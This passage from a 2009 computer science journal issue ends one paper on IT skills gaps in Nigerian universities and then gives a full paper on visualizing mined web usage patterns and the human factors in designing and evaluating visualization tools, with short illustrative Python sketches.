This will require adjustments to the curriculum and format of university education. It will also require universities to be more open to constructive engagement with employers of labor, as well as encouraging employers to share their hands-on experience with, and to inspire, university students while they are still in school. On the other hand, universities need significant funding improvements for research, learning and related intellectual activities, intellectual freedom, the scope to think and interact with academics in many locations and circumstances, and the ability to articulate and operate semi-autonomously, such that those who provide the funding should not believe that everything related to their funding must be done their way at all times.
From the foregoing, it is obvious that bridging the skill gaps is not merely a matter of improving students’ competence in core fields of IT. Education with relevant syllabuses and training in specific areas plays a crucial role in achieving rapid changes in updating technical and engineering skills, especially in making the degree in computing relevant to the IT skill demands of our industries.
REFERENCES
[1] Avison, D., “The ‘Discipline’ of Information Systems: Teaching, Research, and Practice”, in Mingers, J. and Stowell, F. (eds.), Information Systems: An Emerging Discipline?, Maidenhead: McGraw-Hill, 1997, pp. 113-136.
[2] Barrows, C. W. and Walsh, J., “‘Bridging the gap’ between hospitality management programmes and the private club industry”, International Journal of Contemporary Hospitality Management, Vol. 14, No. 3, 2002, pp. 120-127, ISSN 0959-6119.
[3] Clayton, J. and Monrosh, K. F., Cooperative Training Initiative: An Assessment of Reciprocal Relationships between Universities and Industry in Providing Professional Development, 2005, ISBN 3459.
[4] Gonzales, L., Competencies in Two Sectors in which Information Technology (IT) Asserts a Strong Influence: Telecommunications and Administration/Offices, Thessaloniki, Greece: CEDEFOP, November 1996.
[5] Mosley, I. T., Computer Management Information Systems and Computer Production Skills Needed by Industrial Technology Graduates as Perceived by Universities and Companies, 2006, ISBN 234-4.
[6] Mahmood, F. and Aamir, M., “Future Information and Communication Networks: Major Trends and Projections for Developing Countries”, Int’l Workshop on the Frontiers of Information Technology, Islamabad, Pakistan, December 23-24, 2003.
[7] Kayode, A., “Bridging the Skills Gap in Nigeria: Framework for Dialogue between Universities and Employers of Labor”, presented at the 24th Conference of the Association of Vice-Chancellors of Nigerian Universities, University of Ilorin, Ilorin, Nigeria, 2 June 2009.
[8] Mosley, I. T., “Computer Management Information Systems and Computer Production Skills Needed by Industrial Technology Graduates as Perceived by Universities and Companies”, seminar paper presented at the University of Port Harcourt, Nigeria.
[9] www.edu.ng
[10] www.unilorin.ng
[11] http://ieeexplore.ieee.org, IEEE Digital Library
[12] Olayiwola, K., “Overview of the New Undergraduate Computer Science Curriculum”, Associate Chair for Education, 2008.
[13] www.csta.acm.org
[14] http://educationmalaysia.blogspot.com/2006/07/70-public-university-graduates-jobless.html
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No. 1 & 2, 2009
Visualization of Mined Pattern and Its Human
Aspects
Ratnesh Kumar Jain, Dr. R. S. Kasana
Department of Computer Science and Applications
Dr. H. S. Gour Central University
Sagar, MP, India
jratnesh@rediffmail.com, irkasana7158@gmail.com

Dr. Suresh Jain
Department of Computer Engineering, Institute of Engineering & Technology,
Devi Ahilya University, Indore, MP (India)
suresh.jain@rediffmail.com
Abstract—Researchers have succeeded in mining Web usage data effectively and efficiently. However, the mined patterns are often not represented in a form suitable for direct human consumption, so mechanisms and tools that can represent mined patterns in an easily understandable format are needed. Among the techniques used for pattern analysis is visualization. Visualization can provide valuable assistance for data analysis and decision-making tasks. In the data visualization process, technical representations of web pages are replaced by user-friendly textual interpretations. Experiments with real-world problems have shown that visualization can significantly increase the quality and usefulness of web log mining results. However, how decision makers perceive and interact with a visual representation can strongly influence their understanding of the data as well as the usefulness of the visual presentation. Human factors therefore contribute significantly to the visualization process and should play an important role in the design and evaluation of visualization tools.

Keywords—Web log mining, Knowledge representation, Visualization, Human Aspects.
I. INTRODUCTION
The dictionary meaning of visualize is "to form a mental vision, image, or picture of (something not visible or present to sight, or of an abstraction); to make visible to the mind or imagination" [The Oxford English Dictionary, 1989]. The discovery of Web usage patterns would not be very useful unless there are mechanisms and tools to help an analyst better understand them. Visualization has been used very successfully in helping people understand various kinds of phenomena, both real and abstract, and is hence a natural choice for understanding the behavior of Web users. "The essence of information visualization is the creation of an internal model or image in the mind of a user. Hence, information visualization is an activity that humankind is engaged in all the time" [1].
Figure 1. Visualization Process
Visualization of web usage data is a technique in which the mined data are represented graphically. In this process, technical representations of web pages are replaced by user-friendly textual interpretations.
A. VISUALIZATION TECHNIQUES
There are a large number of visualization techniques that can be used for visualizing data. In addition to standard 2D/3D techniques, such as x-y (x-y-z) plots, bar charts, line graphs, etc., there are a number of more sophisticated visualization techniques (see Fig. 2). The classes correspond to basic visualization principles, which may be combined in order to implement a specific visualization system.
Figure 2. Classification of Visualization technique
1) Geometrically Transformed Displays
Geometrically transformed display techniques aim at finding "interesting" transformations of multidimensional data sets. This class includes techniques from exploratory statistics, such as scatterplot matrices, and techniques that can be subsumed under the term "projection pursuit". Other geometric projection techniques include Projection Views, Hyperslice, and the well-known Parallel Coordinates visualization technique.
Figure 3. Parallel Coordinate Visualization
Figure 4. Dense pixel displays (Courtesy IEEE)
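The core of the parallel-coordinates technique (Fig. 3) can be sketched in a few lines of Python. This is an illustrative sketch of ours, not code from any cited system; the function name and the min-max normalization are assumptions:

```python
def parallel_coordinates(records):
    """Map d-dimensional records to polylines over d parallel axes.

    Each record becomes a list of (axis_index, normalized_value)
    vertices; values are min-max normalized per dimension so that
    every axis spans [0, 1]. Constant dimensions map to 0.
    """
    dims = len(records[0])
    lo = [min(r[i] for r in records) for i in range(dims)]
    hi = [max(r[i] for r in records) for i in range(dims)]
    span = [(h - l) or 1.0 for l, h in zip(lo, hi)]  # avoid divide-by-zero
    return [[(i, (r[i] - lo[i]) / span[i]) for i in range(dims)]
            for r in records]

# Three 3-dimensional data items become three polylines
polylines = parallel_coordinates([(1, 10, 5), (2, 20, 5), (3, 30, 5)])
```

A renderer would then draw each polyline across d vertical axes; crossings and bundles between adjacent axes reveal correlations between those dimensions.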
2) Iconic Displays
Another class of visual data exploration techniques is the iconic display techniques. The idea is to map the attribute values of a multidimensional data item to the features of an icon.
3) Dense Pixel Displays
The basic idea of dense pixel techniques is to map each
dimension value to a colored pixel and group the pixels
belonging to each dimension into adjacent areas. See figure 4.
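To make the dense-pixel idea concrete, the following sketch (ours; the grayscale mapping and function name are assumptions) builds one subwindow per dimension, mapping each record's value to a pixel intensity:

```python
def dense_pixel_display(records):
    """One subwindow per dimension: record k's value for that dimension
    becomes the intensity (0-255) of pixel k, min-max scaled within the
    dimension so each subwindow uses the full grayscale range."""
    dims = len(records[0])
    windows = []
    for i in range(dims):
        col = [r[i] for r in records]
        lo, hi = min(col), max(col)
        span = (hi - lo) or 1.0
        windows.append([int(round(255 * (v - lo) / span)) for v in col])
    return windows

windows = dense_pixel_display([(0, 100), (5, 200), (10, 300)])
```

A real system would additionally arrange each subwindow's pixels with a space-filling layout so that pixels belonging to the same record sit at corresponding positions in every subwindow.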
4) Stacked Displays
Stacked display techniques are tailored to present data
partitioned in a hierarchical fashion. In the case of
multidimensional data, the data dimensions to be used for
partitioning the data and building the hierarchy have to be
selected appropriately. See figure 5.
B. INTERACTION AND DISTORTION TECHNIQUES
In addition to the visualization technique, effective data exploration requires interaction and distortion techniques. Interaction techniques allow the data analyst to interact directly with the visualizations and to change them dynamically according to the exploration objectives; they also make it possible to relate and combine multiple independent visualizations. Distortion techniques help in the data exploration process by providing means for focusing on details while preserving an overview of the data. The basic idea of distortion techniques is to show portions of the data with a high level of detail, while others are shown with a lower level of detail.
Figure 5. Dimensional Stacking display (Courtesy IEEE)
1) Dynamic Projections
The basic idea of dynamic projections is to dynamically
change the projections in order to explore a multidimensional
data set. A classic example is the Grand Tour system [24], which tries to show all interesting two-dimensional projections of a multidimensional data set as a series of scatter plots.
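Each frame of such a tour is simply an orthogonal projection of the d-dimensional points onto a 2D plane; animating the plane's basis vectors produces the sequence of scatter plots. A minimal sketch (ours, not the Grand Tour implementation itself):

```python
def project_2d(points, u, v):
    """Project d-dimensional points onto the plane spanned by the
    orthonormal vectors u and v, giving one (x, y) scatter-plot
    coordinate per point."""
    dot = lambda a, b: sum(x * y for x, y in zip(a, b))
    return [(dot(p, u), dot(p, v)) for p in points]

# One tour frame over 3D data: project onto the x-z plane
frame = project_2d([(1, 2, 3), (4, 5, 6)], u=(1, 0, 0), v=(0, 0, 1))
```

The Grand Tour additionally chooses a smooth sequence of planes so that, over time, all "interesting" 2D views are visited.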
2) Interactive Filtering
In exploring large data sets, it is important to interactively
partition the data set into segments and focus on interesting
subsets. This can be done by a direct selection of the desired
subset (browsing) or by a specification of properties of the
desired subset (querying). Browsing is very difficult for very
large data sets and querying often does not produce the desired
results. Therefore, a number of interaction techniques have
been developed to improve interactive filtering in data
exploration. Examples are Magic Lenses [26], InfoCrystal [27], etc.

3) Interactive Zooming
In dealing with large amounts of data, it is important to present
the data in a highly compressed form to provide an overview
of the data, but, at the same time, allow a variable display of
the data on different resolutions. Zooming not only means to
display the data objects larger, but also means that the data
representation automatically changes to present more details
on higher zoom levels. The objects may, for example, be
represented as single pixels on a low zoom level, as icons on
an intermediate zoom level, and as labeled objects on a high
resolution. Examples are the TableLens approach [28], Pad++ [29], etc.
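The level-of-detail switch at the heart of semantic zooming can be sketched as follows; the zoom thresholds and representation names are illustrative assumptions of ours, not taken from TableLens or Pad++:

```python
def representation(zoom):
    """Pick a data representation for the current zoom level: single
    pixels when zoomed far out, icons at intermediate zoom, and fully
    labeled objects when zoomed in."""
    if zoom < 0.3:
        return "pixel"
    if zoom < 0.7:
        return "icon"
    return "labeled object"
```

A zooming interface would call such a function on every zoom change and re-render the affected objects with the chosen representation.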
4) Interactive Distortion

Interactive distortion techniques support the data exploration
process by preserving an overview of the data during drill-
down operations. The basic idea is to show portions of the data
with a high level of detail while others are shown with a lower
level of detail. Popular distortion techniques are hyperbolic
and spherical distortions, which are often used on hierarchies
or graphs, but may be also applied to any other visualization
technique. An example of spherical distortions is provided in
the Scalable Framework paper (see Fig. 5 in [23]). Other
examples are Bifocal Displays [30], Graphical Fisheye Views
[31] etc.
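A classic distortion function of this kind is the graphical fisheye of Sarkar and Brown, closely related to [31]: a point at normalized distance x from the focus is displaced to g(x) = (d + 1)x / (dx + 1), where d controls the degree of distortion. A sketch (ours):

```python
def fisheye(x, d=3.0):
    """Sarkar-Brown fisheye: map a normalized distance x in [0, 1] from
    the focus to g(x) = (d + 1) * x / (d * x + 1). Detail near the
    focus is magnified and the periphery is compressed, while
    g(0) = 0 and g(1) = 1 keep the overall frame (the overview) intact."""
    return (d + 1) * x / (d * x + 1)
```

Applying g to each point's distance from the focus yields the "focus plus context" effect of Fig. 10.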
5) Interactive Linking and Brushing
The idea of linking and brushing is to combine different
visualization methods to overcome the shortcomings of single
techniques. It can be applied to visualizations generated by all
visualization techniques described above. As a result, the brushed points are highlighted in all visualizations, making it possible to detect dependencies and correlations. Interactive changes made in one visualization are automatically reflected in the other visualizations. Typical examples of visualization
techniques which are combined by linking and brushing are
multiple scatterplots, bar charts, parallel coordinates, pixel
displays, and maps. Most interactive data exploration systems
allow some form of linking and brushing. Examples are
Polaris [22], XGobi [25] and DataDesk [32].
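The mechanism behind linking and brushing is a selection shared by all views. A minimal sketch (ours; the class and callback names are illustrative, not from the cited systems):

```python
class SharedSelection:
    """Linking-and-brushing model: views register callbacks, and
    brushing a set of record indices in any one view highlights the
    same records in every linked view."""
    def __init__(self):
        self.views = []
        self.brushed = set()

    def link(self, on_change):
        self.views.append(on_change)

    def brush(self, indices):
        self.brushed = set(indices)
        for notify in self.views:
            notify(self.brushed)

# Two linked "views" that simply record which points to highlight
scatter_highlight, bar_highlight = [], []
model = SharedSelection()
model.link(lambda s: scatter_highlight.extend(sorted(s)))
model.link(lambda s: bar_highlight.extend(sorted(s)))
model.brush({2, 5})
```

In a real tool the callbacks would redraw a scatter plot, a bar chart, parallel coordinates, etc., each highlighting the same brushed records.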
Experiments with real-world problems have shown that visualization can significantly increase the quality and usefulness of web log mining results. However, how decision makers perceive and interact with a visual representation can strongly influence their understanding of the data as well as the usefulness of the visual presentation. In Section III we explore the human aspects of visualization, and in Section IV we discuss some research examples.
II. RELATED WORK
The most common visualization technique is graph drawing, which has been a subject of research for decades [5, 9]. Graphs are a natural means to model the structure of the web, as pages are represented by nodes and links by edges. Many graph algorithms are used, in original or adapted form, to calculate and express properties of web sites and individual pages [4, 7, 8]. Although to a lesser extent, graph-theoretic methods have also been applied to user navigation paths through web sites [10]. WebQuilt [11] is a logging and visualization system that is interactive in the sense that it provides semantic zooming and filtering, given a storyboard. Webviz [2], VISVIP [3], and VisualInsights [12] are some other visualization tools. Many commercial visualization tools for representing association rules have also been developed, among them MineSet [14] and QUEST [13]. Becker [15, 16] describes a series of elegant visualization techniques designed to support data mining of business databases. Westphal et al. [17] give an excellent introduction to the visualization techniques provided by current data mining tools. Cockburn and McKenzie [6] discuss various issues related to graphical representations of web browsers' revisitation tools.
How a viewer perceives an item in a visualization display
depends on many factors, including lighting conditions, visual
acuity, surrounding items, color scales, culture, and previous
experience [18]. There are many technical challenges in developing a good visualization tool; one of the biggest is user acceptability. Many novel visualization techniques have been presented, yet their widespread deployment has not taken place, largely because of limited user acceptance stemming from the lack of a visual analytics approach. Many researchers have started to work in this direction. An example is the IBM Remail project [20]
which tries to enhance human capabilities to cope with email
overload. Concepts such as “Thread Arcs”, “Correspondents
Map”, and “Message Map” support the user in efficiently
analyzing his personal email communication. MIT’s project
Oxygen [19] even goes one step further, by addressing the
challenges of new systems to be pervasive, embedded,
nomadic, adaptable, powerful, intentional and eternal. Users are an integral part of the visualization process, especially
when the visualization tool is interactive. Rheingans suggests
that interaction should not be simply a “means to the end of
finding a good representation” [21]. Interaction itself can be
valuable since exploration may reveal insight that a set of
fixed images cannot. Human factors-based design involves
designing artifacts to be usable and useful for the people who
are intended to benefit from them. Unfortunately, this
principle is sometimes neglected in visualization systems.
III. HUMAN FACTORS
How people perceive and interact with a visualization tool can strongly influence their understanding of the data as well as the system's usefulness. Human factors (e.g., interaction, cognition, perception, collaboration, presentation, and dissemination) play a key role in the communication between human and computer; they therefore contribute significantly to the visualization process and should play an important role in the design and evaluation of visualization tools. Several research initiatives have begun to explore human factors in visualization.
A. Testing of Human Factors
There are many human-computer interaction interfaces available. Each interface is tested for its functionality (usability studies) and ease of interaction (user studies).
1) Ease of interaction
To test ease of interaction we consider only real users and
obtain both qualitative and quantitative data. Quantitative data
typically measures task performance e.g. time to complete a
specific task or accuracy e.g. number of mistakes. User ratings
on questions such as task difficulty or preference also provide
quantitative data. Qualitative data may be obtained through
questionnaires, interviews, or observation of subjects using the
system.
Walenstein [45] describes several challenges with formal user studies. According to him, the main problem is that user studies involve many ordinary users, whereas the true facts about ease of use and benefits can be told only by experts, who can be difficult to find or may not have time to participate in lengthy studies. Another problem is that missing or inappropriate features in the test tool, or problems in the interface, can easily dominate the results and hide the benefits of the ideas we really want to test. Thus, it seems that user studies can only be useful with an extremely polished tool, so that huge amounts of time must be invested to test simple ideas that may not turn out to be useful. One solution to this problem is to have user studies focus on design ideas rather
than complete visualization tools and to test specific
hypotheses [45]. Our test should attempt to validate 1) whether
the idea is effective and 2) why it is or is not effective. Of
course, this may not be as easy as it sounds.
2) Usability Study
Additional evaluation methods established in Human
Computer Interaction include cognitive walk-throughs (where
an expert “walks through” a specific task using a prototype system, thinking carefully about potential problems that could occur at each step) and heuristic evaluations (where an expert
evaluates an interface with respect to several predefined
heuristics) [42]. Similarly, Blackwell et al. describe cognitive
dimensions, a set of heuristics for evaluating cognitive aspects
of a system [34], and Baldonado et al. designed a set of
heuristics specific to multiple view visualizations [33]. These
usability inspection methods avoid many of the problems with
user studies and may be beneficial for evaluating
visualizations. However, because these techniques are (for the
most part) designed for user interface testing, it is not clear
how well they will evaluate visualization ideas. For example,
many visualization tasks are ill-defined. Walking through a
complex cognitive task is very different from walking through a well-defined interface manipulation task. Furthermore, by
leaving end users out of the evaluation process, usability
inspection methods limit our ability to find unexpected errors.
Figure 6. Visualization Design cycle
B. User-Centered Design
User-centered design is an iterative process involving task
analysis, design, prototype implementation, and testing, as
illustrated in Fig. 6. Users are involved as much as possible at
each design phase. Development may start at any position in
the cycle, but would typically start with an analysis of the
tasks the system should perform or testing of an existing
system to determine its faults and limitations. User-centered
design is more a philosophy than a specific method. Although
it is generally accepted in human computer interaction, we
believe this approach is not currently well-known in
visualization and could support better visualization design.
Various aspects of human factors-based design have been
incorporated into visualization research and development. We
provide examples of these contributions throughout the next
section.
IV. RESEARCH EXAMPLES
Adoption of human factors methodology and stringent
evaluation techniques by the visualization community is in its
infancy. A number of research groups have begun to consider
these ideas and incorporate them into the design process to
greater or lesser extents. This section will summarize these
human factors contributions.
A. Improving Perception in Visualization Systems

Several papers have looked at how our knowledge of
perception can be used to improve visualization designs. For
example, depth of focus is the range of distances in which
objects appear sharp for a particular position of the eye’s lens.
Objects outside this range will appear blurry. Focusing effects
can be used to highlight information by blurring everything
except the highlighted objects [40]. For example, in racing video games, objects meant to appear far away are blurred, and as the player moves forward the blurring is gradually reduced, giving the impression of approaching those objects. Similarly, in a GIS application, all routes between two cities except the shortest one could be blurred to highlight the best route. Here, the goal of blurring is to highlight information, not to focus on objects in the center of a user's field of view; hence, the blurred objects are not necessarily at similar depths, a difference from traditional "depth of focus" effects. Figures 7 and 8 show how perception can be improved by blurring.
Figure 7. Improving perception by blurring long distance objects
Figure 8. Improving perception by blurring
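The selective blurring of [40] can be illustrated on a 1D signal: every sample is box-blurred except the highlighted ones, which stay sharp. This sketch is ours and purely illustrative:

```python
def semantic_blur(values, highlighted, radius=1):
    """Blur every sample with a box filter of the given radius, except
    samples whose index is in `highlighted`, which keep their original
    (sharp) value -- a 1D analogue of semantic depth of field."""
    out = []
    n = len(values)
    for i, v in enumerate(values):
        if i in highlighted:
            out.append(v)
        else:
            lo, hi = max(0, i - radius), min(n, i + radius + 1)
            window = values[lo:hi]
            out.append(sum(window) / len(window))
    return out

blurred = semantic_blur([0, 9, 0, 0], highlighted={1})
```

In 2D the same idea applies per pixel, with the highlighted set defined by the objects to emphasize rather than by depth from the camera.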
Figure 9. Perceptual Model
Figure 10. Fisheye distortion
B. Interaction Metaphors
Interacting with 3D visualizations can be challenging because
mapping movements of a 2D mouse to actions in 3D space is
not straightforward. Research has shown that manipulating
objects relative to each other is easier than using absolute
coordinates [37]. In addition, interaction may be easier when
the interface is directly related to the task through task-specific
props. Examples of task-specific props for visualization are: a
physical model head and clip plane that aid interaction with
volumetric brain data [38] and the “Cubic Mouse,” a 3D input
device for volume data that allows users to navigate along major axes by moving three perpendicular rods in a physical
box [36]. Development of task-specific input devices for other
visualization applications (e.g., flow visualization) could make
interaction easier and thereby enhance data analysis.
In addition to interactive hardware, some interactive programming and presentation effort is needed for tasks such as manipulating windows and widgets, navigating around interfaces, and managing data; these tasks are called maneuvering. For example, an analyst examining user
access to a website may begin by examining several visual images.
Generating these images may require manipulation of several
windows and widgets within the visualization tool. If the analyst
then decides to examine the data quantitatively, he or she may
need to return to the original window to look up values and/or
switch to a different computer program in order to perform a
mathematical analysis or generate statistics. These maneuvering
operations are time consuming and distract users from their
ultimate goals; thus, some necessary tools for these tasks should
be integrated with the visualization tool to minimize
unnecessary navigation.
C. Perceptual Models for Computer Graphics
Various mathematical models of visual perception are
available today. Typical models approximate contrast
sensitivity, amplitude nonlinearity (sensitivity changes with
varying light level), and masking effects of human vision.
Two examples are the Daly Visual Differences Predictor [35]
and the Sarnoff Visual Discrimination Model [41]. Variations
on these models have been used for realistic image synthesis.
Improving realism is less important in visualization, because the emphasis is not on representing a real-world image but on representing data for analysis purposes. Applications
more relevant to visualization include increasing rendering
speed (to enable interactive data exploration) and reducing
image artifacts (to enhance perception and prevent incorrect
interpretations of data). Reddy removed imperceptible details
to reduce scene complexity and improve rendering speed [43].
D. Transfer Functions
In direct volume rendering, each voxel (sample in a 3D
volume grid) is first classified as belonging to a particular
category based on its intensity and/or spatial gradient value(s).
Voxels are then assigned a color and transparency level based on this classification. The function that does this is called a
transfer function. One example in Computed Tomography
(CT) data would be to make skin semitransparent and bones
opaque so the bones could be seen beneath the skin. In this
case, transfer function design is quite easy since bones and
skin have very different intensity values in CT data and can be
easily distinguished. However, in general, finding good
transfer functions is difficult and is therefore a major research
area in volume visualization.
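The CT example above can be sketched as a simple piecewise transfer function. The intensity thresholds and colors below are illustrative assumptions of ours, not calibrated CT values:

```python
def ct_transfer_function(intensity):
    """Map a voxel intensity to (r, g, b, alpha): air is fully
    transparent, soft tissue/skin is semitransparent, and bone is
    opaque white, so bone shows through the skin when rendered."""
    if intensity < -500:             # air
        return (0.0, 0.0, 0.0, 0.0)
    if intensity < 300:              # soft tissue / skin
        return (1.0, 0.8, 0.7, 0.1)
    return (1.0, 1.0, 1.0, 1.0)      # bone
```

During rendering, each classified voxel's color is composited along the viewing ray weighted by its alpha, which is what lets the opaque bone show through the semitransparent skin.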
E. Detail and Context Displays (Distortion)
Resolution of the computer monitor is limited. Only a limited
number of graphic items can be displayed at one time.
Displaying more items often means displaying less detail
about each item. If all items are displayed, few details can be
read, but if only a few items are shown, we can lose track of
their global location. Interactive distortion techniques support
the data exploration process by preserving an overview of the
data during drill-down operations. The basic idea is to show
portions of the data with a high level of detail while others are
shown with a lower level of detail.
F. User and Computer Cooperation
Computers can easily store and display data, but humans are
better at interpreting data and making decisions. Although this
idea is very useful, it is possible for computers to play a more
active role in the visualization process than simply presenting data and providing an interface for data manipulation. As
viewers look at images, they compare the image with their
existing mental model of the data and presentation method and
adjust either their mental model or their understanding of the
image if the two conflict.
For complex data, constructing a mental model requires
interaction and time since all the data cannot be seen in a
single view. Allowing users to write down and manipulate
their mental models, ideas, and insight (e.g., as mind maps)
could reduce demands on human memory and help users
identify new patterns or relationships.
V. CONCLUSION AND FUTURE WORK
Scientists use visualization tools for data analysis in several disciplines. However, current visualization tools do not support "integration of insight," an important data analysis task that involves taking notes, recording and organizing ideas and images, keeping track of the data analysis history, and sharing ideas with others. Overall, visualization
systems could play several roles:
(a). Visually represent data to enhance data analysis,
(b). Visually display users’ mental models, interpretations of
the data, ideas, hypotheses, and insight,
(c). help users to improve their mental models by finding
supporting and contradictory evidence for their
hypotheses, and
(d). help users organize and share ideas.
Current research in visualization is almost exclusively devoted
to the first objective. Research into the others has not been
greatly explored and could make a valuable addition to data
analysis tools. In the above study we identified several specific directions for future work:
• Integrating human factors (perception and cognition theories) into visualization techniques,
• Developing and evaluating task-specific input devices to aid interaction,
• Developing tools that provide cognitive support for insight and organization of ideas.
ACKNOWLEDGMENT
The authors are grateful to the technical reviewers for their comments, which improved the clarity and presentation of the paper.
REFERENCES
[1] Banissi, E., "Information Visualization". Encyclopedia of Computer Science and Technology, 2000, Vol. 42(27).
[2] J. Pitkow and Krishna K. Bharat. "Webviz: A tool for World Wide Web access log analysis". In First International WWW Conference, 1994.
[3] Cugini, J. and J. Scholtz. "VISVIP: 3D Visualization of Paths through Web Sites". In Proceedings of the International Workshop on Web-Based Information Visualization (WebVis '99). Florence, Italy: IEEE Computer Society, 1999.
[4] Baldi, P., Frasconi, P. and Smith, P. "Modeling the Internet and the Web: Probabilistic Methods and Algorithms". Wiley, ISBN 0-470-84906-1, 2003.
[5] Chen, C. "Information Visualisation and Virtual Environments". Springer-Verlag, ISBN 1-85233-136-4, 1999.
[6] Cockburn, A. and McKenzie, B. "What Do Web Users Do? An Empirical Analysis of Web Use". Intl. J. Human-Computer Studies 54 (6), 2000, 903-922.
[7] Herder, E. and Juvina, I. "Discovery of Individual Navigation Styles". Proc. of Workshop on Individual Differences in Adaptive Hypermedia at Adaptive Hypermedia 2004, 2004.
[8] Herder, E. and Van Dijk, B. "Site Structure and User Navigation: Models, Measures and Methods". In Adaptable and Adaptive Hypermedia Systems, edited by S.Y. Chen and G.D. Magoulas, 2004, 19-34.
[9] Herman, I., Melançon, G. and Marshall, M.S. "Graph Visualization and Navigation in Information Visualization: A Survey". IEEE Trans. Visualization and Computer Graphics 6 (1), 2000, 24-43.
[10] McEneaney, J.E. "Visualizing and Assessing Navigation in Hypertext". Proc. Hypertext '99, 1999, 61-70.
[11] Waterson, S.J., Hong, J.I., Sohn, T. and Landay, J.A. "What Did They Do? Understanding Clickstreams with the WebQuilt Visualization System". Proc. Advanced Visual Interfaces, 2002.
[12] VisualInsights. eBizinsights. 2001. http://www.visualinsights.com.
[13] http://www.almaden.ibm.com/cs/quest/publications.html#associations
[14] http://www.sgi.com/software/mineset
[15] Barry G. Becker. Volume Rendering for Relational Data. In John Dill and Nahum Gershon, editors, Proceedings of Information Visualization '97, pages 87-90, Phoenix, Arizona, October 20-21, 1997. IEEE Computer Society Press.
[16] Barry G. Becker. Visualizing Decision Table Classifiers. In Graham Wills and John Dill, editors, Proceedings of Information Visualization '98, pages 102-105, Research Triangle Park, North Carolina, October 19-20, 1998. IEEE Computer Society Press.
[17] Christopher Westphal and Teresa Blaxton. Data Mining Solutions: Methods and Tools for Solving Real-World Problems. New York: John Wiley and Sons, Inc., 1998.
[18] C. Ware, Information Visualization: Perception for Design. San Francisco: Morgan Kaufmann (Academic Press), 2000.
[19] MIT Project Oxygen. http://oxygen.lcs.mit.edu/.
[20] S. L. Rohall, D. Gruen, P. Moody, M. Wattenberg, M. Stern, B. Kerr, B. Stachel, K. Dave, R. Armes, and E. Wilcox. Remail: a reinvented email prototype. In Extended Abstracts of the 2004 Conference on Human Factors in Computing Systems, CHI 2004, Vienna, Austria, April 24-29, 2004, pages 791-792, 2004.
[21] P. Rheingans, "Are We There Yet? Exploring with Dynamic Visualization," IEEE Computer Graphics and Applications, vol. 22, no. 1, pp. 6-10, Jan./Feb. 2002.
[22] D. Tang, C. Stolte, and P. Hanrahan, "Polaris: A System for Query, Analysis and Visualization of Multidimensional Relational Databases," IEEE Trans. Visualization and Computer Graphics, vol. 8, no. 1, pp. 52-65, Jan.-Mar. 2002.
[23] N. Lopez, M. Kreuseler, and H. Schumann, "A Scalable Framework for Information Visualization," IEEE Trans. Visualization and Computer Graphics, vol. 8, no. 1, pp. 39-51, Jan.-Mar. 2002.
[24] D. Asimov, "The Grand Tour: A Tool for Viewing Multidimensional Data," SIAM J. Scientific & Statistical Computing, vol. 6, pp. 128-143, 1985.
[25] D.F. Swayne, D. Cook, and A. Buja, "User's Manual for XGobi: A Dynamic Graphics Program for Data Analysis," Bellcore technical memorandum, 1992.
[26] E.A. Bier, M.C. Stone, K. Pier, W. Buxton, and T. DeRose, "Toolglass and Magic Lenses: The See-Through Interface," Proc. SIGGRAPH '93, pp. 73-80, 1993.
[27] A. Spoerri, "InfoCrystal: A Visual Tool for Information Retrieval," Proc. Visualization '93, pp. 150-157, 1993.
[28] R. Rao and S.K. Card, "The Table Lens: Merging Graphical and Symbolic Representation in an Interactive Focus+Context Visualization for Tabular Information," Proc. Human Factors in Computing Systems CHI '94 Conf., pp. 318-322, 1994.
[29] B.B. Bederson and J.D. Hollan, "Pad++: A Zooming Graphical Interface for Exploring Alternate Interface Physics," Proc. Seventh Ann. ACM Symp. User Interface Software and Technology (UIST), pp. 17-26, 1994.
[30] R. Spence and M. Apperley, "Data Base Navigation: An Office Environment for the Professional," Behaviour and Information Technology, vol. 1, no. 1, pp. 43-54, 1982.
[31] G. Furnas, "Generalized Fisheye Views," Proc. Human Factors in Computing Systems CHI '86 Conf., pp. 18-23, 1986.
[32] P.F. Velleman, Data Desk 4.2: Data Description. Ithaca, N.Y.: Data Desk, 1992.
[33] M.Q.W. Baldonado, A. Woodruff, and A. Kuchinsky, "Guidelines for Using Multiple Views in Information Visualization," Proc. Working Conf. Advanced Visual Interfaces, pp. 110-119, 2000.
[34] A.F. Blackwell et al., "Cognitive Dimensions of Notations: Design Tools for Cognitive Technology," Proc. Cognitive Technology, pp. 325-341, 2001.
[35] S. Daly, "The Visible Differences Predictor: An Algorithm for the Assessment of Image Fidelity," Digital Images and Human Vision, A.B. Watson, ed., pp. 179-206, Cambridge, Mass.: MIT Press, 1993.
[36]
B. Fro¨hlich et al., “Cubic-Mouse-Based Interaction in VirtualEnvironments,” IEEE Computer Graphics and Applications, vol. 20, no.4, pp. 12-15, July/Aug. 2000.
[37] K. Hinckley et al., “A Survey of Design Issues in Spatial Input,” Proc.ACM Symp. User Interface Software and Technology, pp. 213-222,1994.
[38] K. Hinckley et al., “Passive Real-World Interface Props forNeurosurgical Visualization,” Proc. Conf. Human Factors in ComputingSystems, pp. 452-458, 1994.
[39] V. Interrante, H. Fuchs, and S.M. Pizer, “Conveying the 3D Shape of Smoothly Curving Transparent Surfaces via Texture,” IEEE Trans.Visualization and Computer Graphics, vol. 3, no. 2, pp. 98-117, Apr.-June 1997.
[40] R. Kosara, S. Miksch, and H. Hauser, “Semantic Depth of Field,” Proc.IEEE Symp. Information Visualization, pp. 97-104, 2001.
[41] J. Lubin, “A Visual Discrimination Model for Imaging System Design
and Evaluation,” Vision Models for Target Detection and Recognition,E. Peli, ed., pp. 245-283, World Scientific, 1995.
[42] R.L. Mack and J. Nielsen, “Usability Inspection Methods: ExecutiveSummary,” Readings in Human-Computer Interaction: Toward the Year2000, second ed., R.M. Baecker et al., eds., pp. 170-181, San Francisco:Morgan Kaufmann, 1995.
[43] M. Reddy, “Perceptually Optimized 3D Graphics,” IEEE ComputerGraphics and Applications, vol. 21, no. 5, pp. 68-75, Sept./Oct. 2001.
AUTHORS PROFILE

Ratnesh Kumar Jain is a Ph.D. student at Dr. H. S. Gour Central University (formerly Sagar University), Sagar, M.P., India. He completed his bachelor's degree in Science (B.Sc.) with Electronics as a special subject in 1998 and his master's degree in computer applications (M.C.A.) in 2001, both from Dr. H. S. Gour University, Sagar, M.P., India. His fields of study are operating systems, data structures, web mining, and information retrieval. He has published more than 5 research papers and has authored a book.
